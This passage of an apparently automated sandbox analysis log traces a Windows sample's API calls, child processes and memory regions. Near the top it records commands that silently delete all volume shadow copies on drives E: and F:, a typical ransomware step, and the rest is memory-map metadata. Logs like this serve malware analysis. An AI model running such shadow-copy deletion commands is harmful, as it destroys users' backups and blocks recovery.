	[0318.297] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=E: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f0a8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=E: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f0f4 | out: lpCommandLine="vssadmin  Delete Shadows /For=E: /All /Quiet ", lpProcessInformation=0x18f0f4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf04, dwThreadId=0xfb4)) returned 1
	[0318.340] CloseHandle (hObject=0xa4) returned 1
	[0318.340] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0318.340] GetProcessHeap () returned 0x4660000
	[0318.340] RtlFreeHeap (HeapHandle=0x4660000, Flags=0x0, BaseAddress=0x466aed0) returned 1
	[0318.340] GetEnvironmentStringsW () returned 0x466a328*
	[0318.340] GetProcessHeap () returned 0x4660000
	[0318.340] RtlAllocateHeap (HeapHandle=0x4660000, Flags=0x8, Size=0xb9c) returned 0x466aed0
	[0318.340] memcpy (in: _Dst=0x466aed0, _Src=0x466a328, _Size=0xb9c | out: _Dst=0x466aed0) returned 0x466aed0
	[0318.340] FreeEnvironmentStringsA (penv="=") returned 1
	[0318.340] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) 

Thread:
	id = 414
	os_tid = 0xe9c


Process:
	id = "75"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x2a3da000"
	os_pid = "0x12f0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "74"
	os_parent_pid = "0x1268"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5527
	        start_va = 0x27000000
	          end_va = 0x271fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000027000000"
	        filename = ""

Region:
	              id = 5528
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5529
	        start_va = 0x5866fc0000
	          end_va = 0x5866ffffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005866fc0000"
	        filename = ""

Region:
	              id = 5530
	        start_va = 0x5867000000
	          end_va = 0x58671fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005867000000"
	        filename = ""

Region:
	              id = 5531
	        start_va = 0x1e4d8bd0000
	          end_va = 0x1e4d8beffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4d8bd0000"
	        filename = ""

Region:
	              id = 5532
	        start_va = 0x1e4d8bf0000
	          end_va = 0x1e4d8c04fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e4d8bf0000"
	        filename = ""

Region:
	              id = 5533
	        start_va = 0x7df5fff00000
	          end_va = 0x7ff5ffefffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5fff00000"
	        filename = ""

Region:
	              id = 5534
	        start_va = 0x7ff7fee90000
	          end_va = 0x7ff7feeb2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fee90000"
	        filename = ""

Region:
	              id = 5535
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 5536
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5537
	        start_va = 0x1e4d8c10000
	          end_va = 0x1e4d8e1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4d8c10000"
	        filename = ""

Region:
	              id = 5538
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 5539
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 5540
	        start_va = 0x1e4d8bd0000
	          end_va = 0x1e4d8bdffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e4d8bd0000"
	        filename = ""

Region:
	              id = 5541
	        start_va = 0x7ff7fed90000
	          end_va = 0x7ff7fee8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fed90000"
	        filename = ""

Region:
	              id = 5542
	        start_va = 0x1e4d8c10000
	          end_va = 0x1e4d8ccdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5543
	        start_va = 0x1e4d8d20000
	          end_va = 0x1e4d8e1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4d8d20000"
	        filename = ""

Region:
	              id = 5544
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 5545
	        start_va = 0x5867200000
	          end_va = 0x586723ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005867200000"
	        filename = ""

Region:
	              id = 5546
	        start_va = 0x1e4d8e20000
	          end_va = 0x1e4d8fcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4d8e20000"
	        filename = ""

Region:
	              id = 5547
	        start_va = 0x1e4d8be0000
	          end_va = 0x1e4d8be6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4d8be0000"
	        filename = ""

Region:
	              id = 5548
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 5549
	        start_va = 0x1e4d8cd0000
	          end_va = 0x1e4d8cd0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e4d8cd0000"
	        filename = ""

Region:
	              id = 5550
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 5551
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 5552
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 5553
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 5554
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 5555
	        start_va = 0x1e4d8ce0000
	          end_va = 0x1e4d8ce6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4d8ce0000"
	        filename = ""

Region:
	              id = 5556
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 5557
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 5558
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 5559
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 5560
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 5580
	        start_va = 0x1e4d8cf0000
	          end_va = 0x1e4d8cf0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4d8cf0000"
	        filename = ""

Region:
	              id = 5581
	        start_va = 0x1e4d8d00000
	          end_va = 0x1e4d8d00fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4d8d00000"
	        filename = ""

Region:
	              id = 5582
	        start_va = 0x1e4d8e20000
	          end_va = 0x1e4d8fa7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e4d8e20000"
	        filename = ""

Region:
	              id = 5583
	        start_va = 0x1e4d8fc0000
	          end_va = 0x1e4d8fcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4d8fc0000"
	        filename = ""

Region:
	              id = 5584
	        start_va = 0x1e4d8fd0000
	          end_va = 0x1e4d9150fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e4d8fd0000"
	        filename = ""

Region:
	              id = 5585
	        start_va = 0x1e4d9160000
	          end_va = 0x1e4da55ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e4d9160000"
	        filename = ""

Region:
	              id = 5586
	        start_va = 0x1e4da560000
	          end_va = 0x1e4da66ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4da560000"
	        filename = ""

Region:
	              id = 5590
	        start_va = 0x5867240000
	          end_va = 0x586727ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005867240000"
	        filename = ""

Region:
	              id = 5591
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 5592
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 5596
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 5597
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 5598
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 5599
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 5600
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 5601
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 5604
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 5607
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 5608
	        start_va = 0x1e4da670000
	          end_va = 0x1e4da82ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4da670000"
	        filename = ""

Region:
	              id = 5611
	        start_va = 0x1e4da830000
	          end_va = 0x1e4dab66fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 5612
	        start_va = 0x1e4da560000
	          end_va = 0x1e4da5b9fff
	       monitored = 1
	     entry_point = 0x1e4da5753f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 5613
	        start_va = 0x1e4da5c0000
	          end_va = 0x1e4da5e0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 5614
	        start_va = 0x1e4da660000
	          end_va = 0x1e4da66ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4da660000"
	        filename = ""

Region:
	              id = 5630
	        start_va = 0x1e4dab70000
	          end_va = 0x1e4dad8bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4dab70000"
	        filename = ""

Region:
	              id = 5631
	        start_va = 0x1e4dad90000
	          end_va = 0x1e4dafadfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4dad90000"
	        filename = ""

Region:
	              id = 5638
	        start_va = 0x1e4da670000
	          end_va = 0x1e4da787fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4da670000"
	        filename = ""

Region:
	              id = 5639
	        start_va = 0x1e4da820000
	          end_va = 0x1e4da82ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4da820000"
	        filename = ""

Region:
	              id = 5640
	        start_va = 0x1e4dafb0000
	          end_va = 0x1e4db1cafff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4dafb0000"
	        filename = ""

Region:
	              id = 5641
	        start_va = 0x1e4db1d0000
	          end_va = 0x1e4db2e3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4db1d0000"
	        filename = ""

Region:
	              id = 5659
	        start_va = 0x5867280000
	          end_va = 0x58672bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005867280000"
	        filename = ""

Region:
	              id = 5660
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 5661
	        start_va = 0x1e4d8d10000
	          end_va = 0x1e4d8d10fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e4d8d10000"
	        filename = ""

Region:
	              id = 5662
	        start_va = 0x1e4da560000
	          end_va = 0x1e4da61bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e4da560000"
	        filename = ""

Region:
	              id = 5663
	        start_va = 0x1e4d8d10000
	          end_va = 0x1e4d8d13fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e4d8d10000"
	        filename = ""

Region:
	              id = 5664
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 5665
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 5666
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 5667
	        start_va = 0x1e4d8fb0000
	          end_va = 0x1e4d8fb6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e4d8fb0000"
	        filename = ""

Region:
	              id = 5668
	        start_va = 0x1e4da620000
	          end_va = 0x1e4da620fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e4da620000"
	        filename = ""

Region:
	              id = 5669
	        start_va = 0x1e4da630000
	          end_va = 0x1e4da630fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e4da630000"
	        filename = ""

Region:
	              id = 5670
	        start_va = 0x1e4da640000
	          end_va = 0x1e4da644fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 5671
	        start_va = 0x1e4da650000
	          end_va = 0x1e4da650fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 5672
	        start_va = 0x1e4da790000
	          end_va = 0x1e4da791fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e4da790000"
	        filename = ""

Region:
	              id = 5673
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 5674
	        start_va = 0x1e4da7a0000
	          end_va = 0x1e4da7a0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 5675
	        start_va = 0x1e4da7b0000
	          end_va = 0x1e4da7b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e4da7b0000"
	        filename = ""


Thread:
	id = 406
	os_tid = 0x12dc


Thread:
	id = 407
	os_tid = 0x12d4


Thread:
	id = 409
	os_tid = 0xdc0


Thread:
	id = 411
	os_tid = 0xe2c


Process:
	id = "76"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x2a37c000"
	os_pid = "0x12c0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "71"
	os_parent_pid = "0x13c4"
	cmd_line = "vssadmin  Delete Shadows /For=F: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5562
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 5563
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 5564
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 5565
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 5566
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 5567
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 5568
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 5569
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 5570
	        start_va = 0x830000
	          end_va = 0x831fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000830000"
	        filename = ""

Region:
	              id = 5571
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 5572
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 5573
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 5574
	        start_va = 0x7eb90000
	          end_va = 0x7ebb2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007eb90000"
	        filename = ""

Region:
	              id = 5575
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5576
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 5577
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 5578
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5579
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 5587
	        start_va = 0x400000
	          end_va = 0x5dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 5588
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 5589
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 5593
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
